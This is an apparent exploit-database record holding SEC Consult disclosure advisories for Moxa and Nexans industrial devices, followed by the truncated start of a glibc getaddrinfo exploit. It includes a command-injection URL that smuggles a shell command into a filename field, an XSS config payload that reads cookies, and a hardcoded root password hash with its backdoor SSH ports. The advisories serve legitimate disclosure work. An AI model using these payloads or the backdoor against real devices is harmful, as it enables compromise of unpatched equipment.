"`SEC Consult Vulnerability Lab Security Advisory < 20210901-0 > \n======================================================================= \ntitle: Multiple vulnerabilities \nproduct: see \"Vulnerable / tested versions\" \nvulnerable version: see \"Vulnerable / tested versions\" \nfixed version: see \"Solution\" \nCVE number: CVE-2021-39278, CVE-2021-39279 \nimpact: High \nhomepage: https://www.moxa.com/ \nfound: 2020-08-31 \nby: T. Weber (Office Vienna) \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult, an Atos company \nEurope | Asia | North America \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \n\"Together, We Create Change \n \nMoxa is committed to making a positive impact around the world. We put our all \nbehind this commitment--from our employees, to our products and supply chain. \n \nIn our local communities, we nurture and support the spirit of volunteering. \nWe encourage our employees to contribute to community development, with an \nemphasis on ecology, education, and health. \n \nIn our products, we invest in social awareness programs and \nenvironment-friendly policies at every stage of the product lifecycle. We make \nsure our manufacturing meets the highest standards with regards to quality, \nethics, and sustainability.\" \n \nSource: https://www.moxa.com/en/about-us/corporate-responsibility \n \nBusiness recommendation: \n------------------------ \nSEC Consult recommends to immediately apply the available patches \nfrom the vendor. A thorough security review should be performed by \nsecurity professionals to identify further potential security issues. \n \n \nVulnerability overview/description: \n----------------------------------- \n1) Authenticated Command Injection (CVE-2021-39279) \nAn authenticated command injection vulnerability can be triggered by issuing a \nGET request to the \"/forms/web_importTFTP\" CGI program which is available on \nthe web interface. An attacker can abuse this vulnerability to compromise the \noperating system of the device. This issue was found by emulating the firmware \nof the device. \n \n2) Reflected Cross-Site Scripting via Manipulated Config-File (CVE-2021-39278) \nVia a crafted config-file, a reflected cross-site scripting vulnerability can \nbe exploited in the context of the victim's browser. This config-file can be \nuploaded to the device via the \"Config Import Export\" tab in the main menu. \n \n3) Known GNU glibc Vulnerabilities (CVE-2015-0235) \nThe used GNU glibc in version 2.9 is outdated and contains multiple known \nvulnerabilities. One of the discovered vulnerabilities (CVE-2015-0235, \ngethostbyname \"GHOST\" buffer overflow) was verified by using the MEDUSA \nscalable firmware runtime. \n \n4) Multiple Outdated Software Components \nMultiple outdated software components containing vulnerabilities were found by \nthe IoT Inspector. \n \nThe vulnerabilities 1), 2) and 3) were manually verified on an emulated device \nby using the MEDUSA scalable firmware runtime. \n \nProof of concept: \n----------------- \n1) Authenticated Command Injection (CVE-2021-39279) \nThe vulnerability can be triggered by navigating in the web interface to the \ntab: \n \n\"Main Menu\"->\"Maintenance\"->\"Config Import Export\" \n \nThe \"TFTP Import\" menu is prone to command injection via all parameters. To \nexploit the vulnerability, an IP address, a configuration path and a filename \nmust be set. \nIf the filename is used to trigger the exploit, the payload in the interceptor \nproxy would be: \n \nhttp://192.168.1.1/forms/web_importTFTP?servIP=192.168.1.1&configPath=/&fileName=name|`ping localhost -c 100` \n \n \n2) Reflected Cross-Site Scripting via Manipulated Config-File (CVE-2021-39278) \nThe vulnerability can be triggered by navigating in the web interface to the \ntab: \n \n\"Main Menu\"->\"Maintenance\"->\"Config Import Export\" \n \nThe \"Config Import\" menu is prone to reflected cross-site scripting via the \nupload of config files. Example of malicious config file: \n------------------------------------------------------------------------------- \n[board] \ndeviceName=\"WAC-2004_0000</span><script>alert(document.cookie)</script>\" \ndeviceLocation=\"\" \n[..] \n------------------------------------------------------------------------------- \nUploading such a crafted file triggers cross-site scripting as the erroneous \nvalue is displayed without filtering characters. \n \n \n3) Known GNU glibc Vulnerabilities (CVE-2015-0235) \nGNU glibc version 2.9 contains multiple CVEs like: \nCVE-2016-1234, CVE-2015-7547, CVE-2013-7423, CVE-2013-1914, and more. \n \nThe gethostbyname buffer overflow vulnerability (GHOST) was checked with the \nhelp of the exploit code from https://seclists.org/oss-sec/2015/q1/274. It was \ncompiled and executed on the emulated device to test the system. \n \n \n4) Multiple Outdated Software Components \nThe IoT Inspector recognized multiple outdated software components with known \nvulnerabilities: \n \nBusyBox 1.18.5 06/2011 \nDropbear SSH 2011.54 11/2011 \nGNU glibc 2.9 02/2009 \nLinux Kernel 2.6.27 10/2008 \nOpenSSL 0.9.7g 04/2005 \nOnly found in the program \"iw_director\" \nOpenSSL 1.0.0 03/2010 \n \n \nVulnerable / tested versions: \n----------------------------- \nThe following firmware versions for various devices have been identified \nto be vulnerable: \n* WAC-2004 / 1.7 \n* WAC-1001 / 2.1 \n* WAC-1001-T / 2.1 \n* OnCell G3470A-LTE-EU / 1.7 \n* OnCell G3470A-LTE-EU-T / 1.7 \n* TAP-323-EU-CT-T / 1.3 \n* TAP-323-US-CT-T / 1.3 \n* TAP-323-JP-CT-T / 1.3 \n* WDR-3124A-EU / 2.3 \n* WDR-3124A-EU-T / 2.3 \n* WDR-3124A-US / 2.3 \n* WDR-3124A-US-T / 2.3 \n \n \nVendor contact timeline: \n------------------------ \n2020-10-09: Contacting vendor through moxa.csrt@moxa.com. \n2020-10-12: Contact sends PGP key for encrypted communication and asks for the \ndetailed advisory. Sent encrypted advisory to vendor. \n2020-11-06: Status update from vendor regarding technical analysis. Vendor \nrequested more time for fixing the vulnerabilities as more products \nare affected. \n2020-11-09: Granted more time for fixing to vendor. \n2020-11-10: Vendor asked for next steps regarding the advisory publication. \n2020-11-11: Asked vendor for an estimation when a public disclosure is possible. \n2020-11-16: Vendor responded that the product team can give a rough feedback. \n2020-11-25: Asked for a status update. \n2020-11-25: Vendor responded that the investigation is not done yet. \n2020-12-14: Vendor provided a list of potential affected devices and stated \nthat full investigation may take until January 2021 due to the list \nof CVEs that were provided with the appended IoT Inspector report. \nThe patches may be available until June 2021. \n2020-12-15: Shifted next status update round with vendor on May 2021. \n2020-12-23: Vendor provided full list of affected devices. \n2021-02-05: Vendor sieved out the found issues from 4) manually and provided a \nfull list of confirmed vulnerabilities. WAC-2004 phased-out in \n2019. \n2021-02-21: Confirmed receive of vulnerabilities, next status update in May \n2021. \n2021-06-10: Asking for an update. \n2021-06-15: Vendor stated, that the update will be provided in the next days. \n2021-06-21: Vendor will give an update in the next week as Covid gets worse in \nTaiwan. \n2021-06-23: Vendor stated, that patches are under development. Vendor needs more \ntime to finish the patches. \n2021-06-24: Set release date to 2021-09-01. \n2021-07-02: Vendor provides status updates. \n2021-08-16: Vendor provides status updates. \n2021-08-17: Vendor asks for CVE IDs and stated, that WDR-3124A has phased-out. \n2021-08-20: Sent assigned CVE-IDs to vendor. Asked for fixed version numbers. \n2021-08-31: Vendor provides fixed firmware version numbers and the advisory \nlinks. \n2021-09-01: Coordinated release of security advisory. \n \nSolution: \n--------- \nAccording to the vendor the following patches must be applied to fix issues: \n* WAC-1001 / 2.1.5 \n* WAC-1001-T / 2.1.5 \n* OnCell G3470A-LTE-EU / 1.7.4 \n* OnCell G3470A-LTE-EU-T / 1.7.4 \n* TAP-323-EU-CT-T / 1.8.1 \n* TAP-323-US-CT-T / 1.8.1 \n* TAP-323-JP-CT-T / 1.8.1 \n \nThe Moxa Technical Support must be contacted for requesting the security \npatches. \n \nThe corresponding security advisories for the affected devices are available on \nthe vendor's website: \nTAP-323/WAC-1001/WAC-2004 \nhttps://www.moxa.com/en/support/product-support/security-advisory/tap-323-wac-1001-2004-wireless-ap-bridge-client-vulnerabilities \nOnCell G3470A-LTE/WDR-3124A \nhttps://www.moxa.com/en/support/product-support/security-advisory/oncell-g3470a-wdr-3124a-cellular-gateways-router-vulnerabilities \n \nThe following device models are EOL and should be replaced: \n* WAC-2004 \n* WDR-3124A-EU \n* WDR-3124A-EU-T \n* WDR-3124A-US \n* WDR-3124A-US-T \n \n \nWorkaround: \n----------- \nNone. \n \n \nAdvisory URL: \n------------- \nhttps://sec-consult.com/vulnerability-lab/ \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult, an Atos company \nEurope | Asia | North America \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an \nAtos company. It ensures the continued knowledge gain of SEC Consult in the \nfield of network and application security to stay ahead of the attacker. The \nSEC Consult Vulnerability Lab supports high-quality penetration testing and \nthe evaluation of new offensive and defensive technologies for our customers. \nHence our customers obtain the most current information about vulnerabilities \nand valid recommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://sec-consult.com/career/ \n \nInterested in improving your cyber security with the experts of SEC Consult? \nContact our local offices https://sec-consult.com/contact/ \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF Thomas Weber / @2021 \n \n`\n", "_state": {"dependencies": 1647589307, "score": 0}}

{"zdt": [{"lastseen": "2022-03-23T04:23:08", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-01T00:00:00", "type": "zdt", "title": "Moxa Command Injection / Cross Site Scripting Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1914", "CVE-2013-7423", "CVE-2015-0235", "CVE-2015-7547", "CVE-2016-1234", "CVE-2021-39278", "CVE-2021-39279"], "modified": "2021-09-01T00:00:00", "id": "1337DAY-ID-36699", "href": "https://0day.today/exploit/description/36699", "sourceData": "=======================================================================\n title: Multiple vulnerabilities\n product: see \"Vulnerable / tested versions\"\n vulnerable version: see \"Vulnerable / tested versions\"\n fixed version: see \"Solution\"\n CVE number: CVE-2021-39278, CVE-2021-39279\n impact: High\n homepage: https://www.moxa.com/\n found: 2020-08-31\n by: T. Weber (Office Vienna)\n SEC Consult Vulnerability Lab\n\n An integrated part of SEC Consult, an Atos company\n Europe | Asia | North America\n\n https://www.sec-consult.com\n\n=======================================================================\n\nVendor description:\n-------------------\n\"Together, We Create Change\n\nMoxa is committed to making a positive impact around the world. We put our all\nbehind this commitment--from our employees, to our products and supply chain.\n\nIn our local communities, we nurture and support the spirit of volunteering.\nWe encourage our employees to contribute to community development, with an\nemphasis on ecology, education, and health.\n\nIn our products, we invest in social awareness programs and\nenvironment-friendly policies at every stage of the product lifecycle. We make\nsure our manufacturing meets the highest standards with regards to quality,\nethics, and sustainability.\"\n\nSource: https://www.moxa.com/en/about-us/corporate-responsibility\n\nBusiness recommendation:\n------------------------\nSEC Consult recommends to immediately apply the available patches\nfrom the vendor. A thorough security review should be performed by\nsecurity professionals to identify further potential security issues.\n\n\nVulnerability overview/description:\n-----------------------------------\n1) Authenticated Command Injection (CVE-2021-39279)\nAn authenticated command injection vulnerability can be triggered by issuing a\nGET request to the \"/forms/web_importTFTP\" CGI program which is available on\nthe web interface. An attacker can abuse this vulnerability to compromise the\noperating system of the device. This issue was found by emulating the firmware\nof the device.\n\n2) Reflected Cross-Site Scripting via Manipulated Config-File (CVE-2021-39278)\nVia a crafted config-file, a reflected cross-site scripting vulnerability can\nbe exploited in the context of the victim's browser. This config-file can be\nuploaded to the device via the \"Config Import Export\" tab in the main menu.\n\n3) Known GNU glibc Vulnerabilities (CVE-2015-0235)\nThe used GNU glibc in version 2.9 is outdated and contains multiple known\nvulnerabilities. One of the discovered vulnerabilities (CVE-2015-0235,\ngethostbyname \"GHOST\" buffer overflow) was verified by using the MEDUSA\nscalable firmware runtime.\n\n4) Multiple Outdated Software Components\nMultiple outdated software components containing vulnerabilities were found by\nthe IoT Inspector.\n\nThe vulnerabilities 1), 2) and 3) were manually verified on an emulated device\nby using the MEDUSA scalable firmware runtime.\n\nProof of concept:\n-----------------\n1) Authenticated Command Injection (CVE-2021-39279)\nThe vulnerability can be triggered by navigating in the web interface to the\ntab:\n\n\"Main Menu\"->\"Maintenance\"->\"Config Import Export\"\n\nThe \"TFTP Import\" menu is prone to command injection via all parameters. To\nexploit the vulnerability, an IP address, a configuration path and a filename\nmust be set.\nIf the filename is used to trigger the exploit, the payload in the interceptor\nproxy would be:\n\nhttp://192.168.1.1/forms/web_importTFTP?servIP=192.168.1.1&configPath=/&fileName=name|`ping localhost -c 100`\n\n\n2) Reflected Cross-Site Scripting via Manipulated Config-File (CVE-2021-39278)\nThe vulnerability can be triggered by navigating in the web interface to the\ntab:\n\n\"Main Menu\"->\"Maintenance\"->\"Config Import Export\"\n\nThe \"Config Import\" menu is prone to reflected cross-site scripting via the\nupload of config files. Example of malicious config file:\n-------------------------------------------------------------------------------\n[board]\ndeviceName=\"WAC-2004_0000</span><script>alert(document.cookie)</script>\"\ndeviceLocation=\"\"\n[..]\n-------------------------------------------------------------------------------\nUploading such a crafted file triggers cross-site scripting as the erroneous\nvalue is displayed without filtering characters.\n\n\n3) Known GNU glibc Vulnerabilities (CVE-2015-0235)\nGNU glibc version 2.9 contains multiple CVEs like:\nCVE-2016-1234, CVE-2015-7547, CVE-2013-7423, CVE-2013-1914, and more.\n\nThe gethostbyname buffer overflow vulnerability (GHOST) was checked with the\nhelp of the exploit code from https://seclists.org/oss-sec/2015/q1/274. It was\ncompiled and executed on the emulated device to test the system.\n\n\n4) Multiple Outdated Software Components\nThe IoT Inspector recognized multiple outdated software components with known\nvulnerabilities:\n\nBusyBox 1.18.5 06/2011\nDropbear SSH 2011.54 11/2011\nGNU glibc 2.9 02/2009\nLinux Kernel 2.6.27 10/2008\nOpenSSL 0.9.7g 04/2005\nOnly found in the program \"iw_director\"\nOpenSSL 1.0.0 03/2010\n\n\nVulnerable / tested versions:\n-----------------------------\nThe following firmware versions for various devices have been identified\nto be vulnerable:\n* WAC-2004 / 1.7\n* WAC-1001 / 2.1\n* WAC-1001-T / 2.1\n* OnCell G3470A-LTE-EU / 1.7\n* OnCell G3470A-LTE-EU-T / 1.7\n* TAP-323-EU-CT-T / 1.3\n* TAP-323-US-CT-T / 1.3\n* TAP-323-JP-CT-T / 1.3\n* WDR-3124A-EU / 2.3\n* WDR-3124A-EU-T / 2.3\n* WDR-3124A-US / 2.3\n* WDR-3124A-US-T / 2.3\n\n\nVendor contact timeline:\n------------------------\n2020-10-09: Contacting vendor through [email\u00a0protected]\n2020-10-12: Contact sends PGP key for encrypted communication and asks for the\n detailed advisory. Sent encrypted advisory to vendor.\n2020-11-06: Status update from vendor regarding technical analysis. Vendor\n requested more time for fixing the vulnerabilities as more products\n are affected.\n2020-11-09: Granted more time for fixing to vendor.\n2020-11-10: Vendor asked for next steps regarding the advisory publication.\n2020-11-11: Asked vendor for an estimation when a public disclosure is possible.\n2020-11-16: Vendor responded that the product team can give a rough feedback.\n2020-11-25: Asked for a status update.\n2020-11-25: Vendor responded that the investigation is not done yet.\n2020-12-14: Vendor provided a list of potential affected devices and stated\n that full investigation may take until January 2021 due to the list\n of CVEs that were provided with the appended IoT Inspector report.\n The patches may be available until June 2021.\n2020-12-15: Shifted next status update round with vendor on May 2021.\n2020-12-23: Vendor provided full list of affected devices.\n2021-02-05: Vendor sieved out the found issues from 4) manually and provided a\n full list of confirmed vulnerabilities. WAC-2004 phased-out in\n 2019.\n2021-02-21: Confirmed receive of vulnerabilities, next status update in May\n 2021.\n2021-06-10: Asking for an update.\n2021-06-15: Vendor stated, that the update will be provided in the next days.\n2021-06-21: Vendor will give an update in the next week as Covid gets worse in\n Taiwan.\n2021-06-23: Vendor stated, that patches are under development. Vendor needs more\n time to finish the patches.\n2021-06-24: Set release date to 2021-09-01.\n2021-07-02: Vendor provides status updates.\n2021-08-16: Vendor provides status updates.\n2021-08-17: Vendor asks for CVE IDs and stated, that WDR-3124A has phased-out.\n2021-08-20: Sent assigned CVE-IDs to vendor. Asked for fixed version numbers.\n2021-08-31: Vendor provides fixed firmware version numbers and the advisory\n links.\n2021-09-01: Coordinated release of security advisory.\n\nSolution:\n---------\nAccording to the vendor the following patches must be applied to fix issues:\n* WAC-1001 / 2.1.5\n* WAC-1001-T / 2.1.5\n* OnCell G3470A-LTE-EU / 1.7.4\n* OnCell G3470A-LTE-EU-T / 1.7.4\n* TAP-323-EU-CT-T / 1.8.1\n* TAP-323-US-CT-T / 1.8.1\n* TAP-323-JP-CT-T / 1.8.1\n\nThe Moxa Technical Support must be contacted for requesting the security\npatches.\n\nThe corresponding security advisories for the affected devices are available on\nthe vendor's website:\nTAP-323/WAC-1001/WAC-2004\nhttps://www.moxa.com/en/support/product-support/security-advisory/tap-323-wac-1001-2004-wireless-ap-bridge-client-vulnerabilities\nOnCell G3470A-LTE/WDR-3124A\nhttps://www.moxa.com/en/support/product-support/security-advisory/oncell-g3470a-wdr-3124a-cellular-gateways-router-vulnerabilities\n\nThe following device models are EOL and should be replaced:\n* WAC-2004\n* WDR-3124A-EU\n* WDR-3124A-EU-T\n* WDR-3124A-US\n* WDR-3124A-US-T\n", "sourceHref": "https://0day.today/exploit/36699", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-22T17:43:36", "description": "Nexans FTTO GigaSwitch industrial/office switches HW version 5 suffer from having a hardcoded backdoor user and multiple outdated vulnerable software components.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-21T00:00:00", "type": "zdt", "title": "Nexans FTTO GigaSwitch Outdated Components / Hardcoded Backdoor Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235", "CVE-2015-7547", "CVE-2015-9261", "CVE-2017-16544", "CVE-2022-32985"], "modified": "2022-06-21T00:00:00", "id": "1337DAY-ID-37806", "href": "https://0day.today/exploit/description/37806", "sourceData": "=======================================================================\n title: Hardcoded Backdoor User and Outdated Software Components\n product: Nexans FTTO GigaSwitch industrial/office switches HW version 5\n vulnerable version: See \"Vulnerable / tested versions\"\n fixed version: V6.02N, V7.02\n CVE number: CVE-2022-32985\n impact: High\n homepage: https://www.nexans.com/\n found: 2020-05-25\n by: T. Weber (Office Vienna)\n SEC Consult Vulnerability Lab\n\n An integrated part of SEC Consult, an Atos company\n Europe | Asia | North America\n\n https://www.sec-consult.com\n\n=======================================================================\n\nVendor description:\n-------------------\n\"As a global player in the cable industry, Nexans is behind the scenes\ndelivering the innovative services and resilient products that carry thousands\nof watts of energy and terabytes of data per second around the world. Millions\nof homes, cities, businesses are powered every day by Nexans\u2019 high-quality\nsustainable cabling solutions. We help our customers meet the challenges they\nface in the fields of energy infrastructure, energy resources, transport,\nbuildings, telecom and data, providing them with solutions and services for the\nmost complex cable applications in the most demanding environments.\"\n\nSource: https://www.nexans.com/company/What-we-do.html\n\n\nBusiness recommendation:\n------------------------\nThe vendor provides a patch which should be installed immediately.\n\nSEC Consult recommends to perform a thorough security review of these\nproducts conducted by security professionals to identify and resolve all\nsecurity issues.\n\n\nVulnerability overview/description:\n-----------------------------------\n1) Outdated Vulnerable Software Components\nA static scan with the IoT Inspector (ONEKEY) revealed outdated software packages that\nare used in the devices' firmware. Four of them were verified by using the\nMEDUSA scalable firmware runtime.\n\n\n2) Hardcoded Backdoor User (CVE-2022-32985)\nA hardcoded root user was found in \"/etc/passwd\". In combination with the\ninvoked dropbear SSH daemon in the libnx_apl.so library, it can be used on port\n50201 and 50200 to login on a system shell.\n\n\nProof of concept:\n-----------------\n1) Outdated Vulnerable Software Components\nBased on an automated scan with the IoT Inspector (ONEKEY) the following third party\nsoftware packages were found to be outdated:\n\nFirmware version 6.02L:\nBusyBox 1.20.2\nDropbear SSH 2012.55\nGNU glibc 2.17\nlighttpd 1.4.48\nOpenSSL 1.0.2h\n\nThe following CVEs were verified with MEDUSA scalable firmware emulation:\n\n* CVE-2015-9261 (Unzip)\nThe crafted ZIP archive \"x_6170921383890712452.bin\" was taken from:\nhttps://www.openwall.com/lists/oss-security/2015/10/25/3\nExecution inside the firmware emulation:\n\nbash-4.2# unzip x_6170921383890712452.bin\nArchive: x_6170921383890712452.bin\n inflating: ]3j\u00bdr\u00abIK-%Ix\ndo_page_fault(): sending SIGSEGV to unzip for invalid read access from 735ededc\nepc = 0044bb28 in busybox[400000+99000]\nra = 0044b968 in busybox[400000+99000]\nSegmentation fault\n\n\n* CVE-2015-0235 (gethostbyname \"GHOST\" buffer overflow)\n\nPoC code was taken from:\nhttps://gist.github.com/dweinstein/66e6a088191ac0e8105c\n\n\n* CVE-2015-7547 (getaddrinfo buffer overflow)\n\nPoC code was taken from:\nhttps://github.com/fjserna/CVE-2015-7547\n\n-bash-4.4# python /medusa_exploits/cve-2015-7547-poc.py &\n[1] 259\n-bash-4.4# chroot /medusa_rootfs/ bin/bash\nbash-4.2# cd /medusa_exploits/\nbash-4.2# ./cve-2015-7547_glibc_getaddrinfo\n[UDP] Total Data len recv 36\n[UDP] Total Data len recv 36\nConnected with 127.0.0.1:34356\n[TCP] Total Data len recv 76\n[TCP] Request1 len recv 36\n[TCP] Request2 len recv 36\nSegmentation fault\n\n\n* CVE-2017-16544 (shell autocompletion vulnerability)\n\nA file with the name \"\\ectest\\n\\e]55;test.txt\\a\" was created to trigger the\nvulnerability.\n-------------------------------------------------------------------------------\n# ls \"pressing <TAB>\"\ntest\n]55;test.txt\n#\n-------------------------------------------------------------------------------\n\n\n2) Hardcoded Backdoor User (CVE-2022-32985)\nThe hardcoded system user, reachable via the dropbear SSH daemon was found due\nto multiple indications on the system. The undocumented root user itself was\ncontained in the \"passwd\" file:\n\nContent of the file \"/etc/passwd\".\n-------------------------------------------------------------------------------\nroot:oFQzvQf5qrI56:0:0:root:/home/root:/bin/sh\n[...]\n-------------------------------------------------------------------------------\n\nA suspicious port for the SSH daemon was chosen in the config file of dropbear:\n\nContent of the file \"/etc/init.d/dropbear\":\n-------------------------------------------------------------------------------\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\nDAEMON=/usr/sbin/dropbear\nNAME=dropbear\nDESC=\"Dropbear SSH server\"\nPIDFILE=/var/run/dropbear.pid\n\nDROPBEAR_PORT=\"50200 -p 50201\"\n[...]\n-------------------------------------------------------------------------------\n\nThis is invoked from \"/usr/lib/libnx_apl.so.0.0.0\", which can be seen in the\nfollowing pseudo-code:\n-------------------------------------------------------------------------------\nvoid dropbear_server_init(char param_1)\n\n{\n __pid_t __pid;\n char *pcVar1;\n int aiStack16 [2];\n\n __pid = fork();\n if (__pid == 0) {\n __pid = fork();\n if (__pid != 0) {\n /* WARNING: Subroutine does not return */\n exit(0);\n }\n if (param_1 == '\\0') {\n pcVar1 = \"/etc/init.d/dropbear stop\";\n }\n else {\n pcVar1 = \"/etc/init.d/dropbear start\"; <---\n }\n execl(\"/bin/sh\",\"sh\",&DAT_2cd91564,pcVar1,0);\n }\n else {\n waitpid(__pid,aiStack16,0);\n }\n return;\n}\n-------------------------------------------------------------------------------\n\n\nThis function is called if a specific command is issued in the CLI interface:\n-------------------------------------------------------------------------------\n[...]\n iVar6 = telnet_cmp_command((char *)(param_3 + 0xf2),\"ssh\",2);\n if (iVar6 != 0) {\n if (param_2 < 4) {\n netbuf_fwd_sprintf(param_1,\"\\r\\n%%Error: Parameter missing\\r\\n\");\n iVar6 = shared_mem_get_addr(&var_shm);\n iVar7 = shared_mem_get_addr(&var_shm);\n uVar8 = shared_mem_read_u8(&var_shm,iVar7 + 0x161a);\n shared_mem_write_u8(&var_shm,iVar6 + 0x161a,uVar8 & 0xff | 0x10);\n return;\n }\n iVar6 = telnet_cmp_command((char *)(param_3 + 0x16b),\"start\",1);\n if (iVar6 != 0) {\n dropbear_server_init('\\x01'); <---\n netbuf_fwd_sprintf(param_1,\"Starting dropbear...\\r\\n\");\n return;\n }\n iVar6 = telnet_cmp_command((char *)(param_3 + 0x16b),\"stop\",1);\n if (iVar6 != 0) {\n dropbear_server_init('\\0'); <---\n netbuf_fwd_sprintf(param_1,\"Stopping dropbear...\\r\\n\");\n return;\n }\n netbuf_fwd_sprintf(param_1,\"Uknown dropbear command...\\r\\n\");\n return;\n[...]\n-------------------------------------------------------------------------------\nThe mentioned library is used in the CLI program that is running on the device.\n\n\nVulnerable / tested versions:\n-----------------------------\nThe following firmware versions have been tested:\n\n* Nexans FTTO GigaSwitch HW Version 5 (all industrial/office switches) / Firmware 6.02L\n* Nexans FTTO GigaSwitch HW Version 5 (all industrial/office switches) / Firmware 5.04M\n\n\nVendor contact timeline:\n------------------------\n2020-05-28: Contacting the vendor's PSIRT under the following link:\n http://www.nexans-ans.de/support/index.php?u=security_portal_sendmail\n No answer.\n2020-06-08: Contacting vendor again via [email\u00a0protected] Extended\n deadline by 11 days.\n2020-06-16: Telephone call with Nexans representative. Security advisory was\n received. It will be reviewed to confirm the found issues.\n2020-06-26: Telephone call with Nexans representative. Nexans is working on the\n reported issues and will remove the dropbear daemon as first\n measure.\n2020-08-04: Vendor stated that a fix for the outdated software components will\n be available in November.\n2020-11-12: Asked for status update.\n2020-11-16: Contact stated, that firmware test will need more time. Updates are\n estimated to be ready in Q1 of 2020.\n2020-11-20: Vendor confirmed Q1 as estimated disclosure date.\n2021-01-21: Asked for status update; Vendor stated that the release with all\n fixes is aimed to be published end of Q1.\n2021-03-09: Asked for status update.\n2021-03-17: Vendor stated that the firmware is in testing stage. The fixed\n firmware will be released in May.\n2021-06-10: Asked for status update.\n2021-06-14: Vendor stated that the firmware is not ready due to COVID19 and\n homeschooling. The fixed firmware will be released end of August.\n2021-08-31: Asked for status update.\n2021-09-07: Vendor stated that the fixed firmware will be ready end of 2021.\n2022-05-23: Informed vendor that the advisory will be released mid of June 2022.\n2022-05-24: Firmware V7.02 is available for download which fixes most outdated\n components issues.\n2022-06-15: Release of security advisory.\n\n\nSolution:\n---------\nThe vendor provides an updated firmware here:\nhttps://www.nexans-ans.de/support/firmware/\n\nFirmware version V6.02N has the backdoor removed and was already published a while ago.\nVersion V7.02 also has the backdoor removed and most of the outdated software issues.\n", "sourceHref": "https://0day.today/exploit/37806", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-02-05T03:09:49", "description": "Exploit for linux platform in category remote exploits", "cvss3": {}, "published": "2016-09-06T00:00:00", "type": "zdt", "title": "glibc - getaddrinfo Stack Based Buffer Overflow (2)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-7547"], "modified": "2016-09-06T00:00:00", "id": "1337DAY-ID-24769", "href": "https://0day.today/exploit/description/24769", "sourceData": "/*\r\n \r\nadd by [email\u00a0protected] (jang kyoung chip)\r\n \r\nThis is a published vulnerability by google in the past.\r\nPlease refer to the link below.\r\n \r\nReference: \r\n- https://googleonlinesecurity.blogspot.kr/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html\r\n- https://github.com/fjserna/CVE-2015-7547\r\n- CVE-2015-7547: glibc getaddrinfo stack-based buffer overflow \r\n \r\nWhen Google announced about this code(vulnerability), \r\nit was missing information on shellcode.\r\nSo, I tried to completed the shellcode.\r\nIn the future, I hope to help your study.\r\n \r\n \r\n(gdb) r\r\nStarting program: /home/haker/client1 \r\nGot object file from memory but can't read symbols: File truncated.\r\n[UDP] Total Data len recv 36\r\n[UDP] Total Data len recv 36\r\nudp send \r\nsendto 1\r\nTCP Connected with 127.0.0.1:60259\r\n[TCP] Total Data len recv 76\r\n[TCP] Request1 len recv 36\r\ndata1 = \u00ef\u00bf\u00bd\u00ef\u00bf\u00bd\u0001\u0001\u0003foo\u0003bar\u0006google\u0003com\u0001\u0001\r\nquery = \u0003foo\u0003bar\u0006google\u0003com\u0001\u0001$(\u00ef\u00bf\u00bd\u0001\u0001\u0003foo\u0003bar\u0006google\u0003com\u001c\u0001\r\n[TCP] Request2 len recv 36\r\nsendto 2\r\ndata1_reply\r\ndata2_reply\r\n[UDP] Total Data len recv 36\r\n[UDP] Total Data len recv 36\r\nudp send \r\nsendto 1\r\nTCP Connected with 127.0.0.1:60260\r\n[TCP] Total 